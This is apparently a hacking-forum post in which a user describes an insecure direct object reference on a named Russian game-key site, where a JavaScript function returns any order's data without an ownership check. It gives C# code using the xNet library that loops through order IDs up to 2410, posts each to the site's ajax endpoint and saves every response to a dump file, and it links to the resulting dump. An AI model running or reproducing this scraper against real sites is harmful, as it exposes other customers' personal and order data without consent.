younessdc
Testing Framework Developer
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
500 XP
Hey!
Today I came across the site DenuvoGame(Russian
Which apparently uploads files to the hosting of this site, to reach through the console to it I could not possibly dig yourself.
Then I registered my account on the site and went to dig further.
After going through the pages of the site, I did not find anything interesting, but when I went to the personal account of the site, it was already more interesting.
For myself the most interesting thing I found is this piece of code.
When called via the console using the showBuy(); command we get the following window.
This window is shown when you open a completed order, but I went down below and found the function showBuyId(id);
Which showed the order data by its ID.
All right, the site does not check who made this order, but just gives all the data when calling this function.
In this way we can pull out the entire list of orders that were placed on the site
By entering showBuyId(2013); in the console
I saw the next window.
Thus, my guess was confirmed, the site gives out the order data without checking whether the account bought it or not.
Next I checked which order number was the final one and it was 2410
Then using C# and the xNet library I made the following code
Code:
using (var request = new HttpRequest
{
IgnoreProtocolErrors = true,
ConnectTimeout = 15000,
ReadWriteTimeout = 15000,
AllowAutoRedirect = true,
UserAgent = Http.ChromeUserAgent(),
Cookies = new CookieDictionary()
})
{
for(int i = 0; i <= 2410; i++)
{
string GetAuth = request.Post("https://denuvogame.ru/ajax/showBuy/", "id=" + i, "application/x-www-form-urlencoded").ToString();
_source.SaveLine(_config.Path + "/Dump.txt", GetAuth); // If you are going to copy then do this here System.IO.File.AppendAllText("Dump.txt", GetAuth + "\r\n");
}
}What the dump itself looks like.
Link to the dump file -
Loading…
nulledpaste.me